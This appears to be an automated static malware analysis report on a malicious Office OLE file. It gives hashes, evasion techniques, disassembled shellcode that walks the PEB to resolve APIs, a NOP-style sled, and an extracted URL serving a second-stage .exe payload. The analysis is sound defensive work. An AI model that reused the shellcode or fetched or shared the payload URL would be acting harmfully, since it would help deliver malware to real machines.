Malicious Office (OLE) / .BIN — malware analysis report

Static analysis result for SHA-256 23bccdfad0c0f125…

MALICIOUS

Office (OLE) / .BIN

2.00 MB First seen: 2026-06-11
MD5: a2e1ff97ba3e984408e36835e2e6de70 SHA-1: eb031d33a59d2cfac9cda3fd79202d2193a53ba9 SHA-256: 23bccdfad0c0f12520e573ef4350e83cb199fb06882e623d2f6efca106dfe612
102 Risk Score

Malware Insights

MITRE ATT&CK
T1027 Obfuscated Files or Information T1497 Virtualization/Sandbox Evasion

The sample exhibits characteristics of a packed executable, including a large amount of slack space and PEB access, which are common evasion techniques. The embedded URL likely points to a secondary payload, such as an executable, which is a typical distribution method for malware.

Heuristics 4

  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    00000991  648b4030          mov eax, dword ptr fs:[eax + 0x30]
00000995  8b400c            mov eax, dword ptr [eax + 0xc]
00000998  8b401c            mov eax, dword ptr [eax + 0x1c]
0000099B  8b7008            mov esi, dword ptr [eax + 8]
0000099E  8b7820            mov edi, dword ptr [eax + 0x20]
000009A1  8b00              mov eax, dword ptr [eax]
000009A3  66837f1800        cmp word ptr [edi + 0x18], 0
000009A8  75f1              jne 0x99b
000009AA  81ec00000000      sub esp, 0
000009B0  89e7              mov edi, esp
000009B2  c7073274910c      mov dword ptr [edi], 0xc917432
000009B8  c7470439e27d83    mov dword ptr [edi + 4], 0x837de239
000009BF  c747086389d14f    mov dword ptr [edi + 8], 0x4fd18963
000009C6  c7470c80d6af9a    mov dword ptr [edi + 0xc], 0x9aafd680
000009CD  c7471058cb3b21    mov dword ptr [edi + 0x10], 0x213bcb58
000009D4  6a03              push 3
000009D6  58                pop eax
000009D7  89fb              mov ebx, edi
000009D9  895750            mov dword ptr [edi + 0x50], edx
000009DC  e835ffffff        call 0x916
000009E1  48                dec eax
000009E2  75f8              jne 0x9dc
000009E4  89df              mov edi, ebx
000009E6  686c6c0000        push 0x6c6c
000009EB  686f6e2e64        push 0x642e6e6f
000009F0  68                .byte 0x68
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 2,097,098 bytes but its declared streams total only 228 bytes — 2,096,870 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x41 bytes
    Disassembly
    Attempted x86 opcode disassembly
    0000088C  41                inc ecx
0000088D  41                inc ecx
0000088E  41                inc ecx
0000088F  41                inc ecx
00000890  41                inc ecx
00000891  41                inc ecx
00000892  41                inc ecx
00000893  41                inc ecx
00000894  41                inc ecx
00000895  41                inc ecx
00000896  41                inc ecx
00000897  41                inc ecx
00000898  41                inc ecx
00000899  41                inc ecx
0000089A  41                inc ecx
0000089B  41                inc ecx
0000089C  41                inc ecx
0000089D  41                inc ecx
0000089E  41                inc ecx
0000089F  41                inc ecx
000008A0  41                inc ecx
000008A1  41                inc ecx
000008A2  41                inc ecx
000008A3  41                inc ecx
000008A4  41                inc ecx
000008A5  41                inc ecx
000008A6  41                inc ecx
000008A7  41                inc ecx
000008A8  41                inc ecx
000008A9  41                inc ecx
000008AA  41                inc ecx
000008AB  41                inc ecx
000008AC  41                inc ecx
000008AD  41                inc ecx
000008AE  41                inc ecx
000008AF  41                inc ecx
000008B0  41                inc ecx
000008B1  41                inc ecx
000008B2  41                inc ecx
000008B3  41                inc ecx
000008B4  41                inc ecx
000008B5  41                inc ecx
000008B6  41                inc ecx
000008B7  41                inc ecx
000008B8  41                inc ecx
000008B9  41                inc ecx
000008BA  41                inc ecx
000008BB  41                inc ecx
000008BC  41                inc ecx
000008BD  41                inc ecx
000008BE  41                inc ecx
000008BF  41                inc ecx
000008C0  41                inc ecx
000008C1  41                inc ecx
000008C2  41                inc ecx
000008C3  41                inc ecx
000008C4  41                inc ecx
000008C5  41                inc ecx
000008C6  41                inc ecx
000008C7  41                inc ecx
000008C8  41                inc ecx
000008C9  41                inc ecx
000008CA  41                inc ecx
000008CB  41                inc ecx
000008CC  41                inc ecx
000008CD  41                inc ecx
000008CE  41                inc ecx
000008CF  41                inc ecx
000008D0  41                inc ecx
000008D1  41                inc ecx
000008D2  41                inc ecx
000008D3  41                inc ecx
000008D4  41                inc ecx
000008D5  41                inc ecx
000008D6  41                inc ecx
000008D7  41                inc ecx
000008D8  41                inc ecx
000008D9  41                inc ecx
000008DA  41                inc ecx
000008DB  41                inc ecx
000008DC  41                inc ecx
000008DD  41                inc ecx
000008DE  41                inc ecx
000008DF  41                inc ecx
000008E0  41                inc ecx
000008E1  41                inc ecx
000008E2  41                inc ecx
000008E3  41                inc ecx
000008E4  41                inc ecx
000008E5  41                inc ecx
000008E6  41                inc ecx
000008E7  41                inc ecx
000008E8  41                inc ecx
000008E9  41                inc ecx
000008EA  41                inc ecx
000008EB  41                inc ecx
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://a.pomf.hummingbird.moe/kampdj.exe In document text (OLE body)

Open this report in the interactive analyzer, or submit your own file for analysis.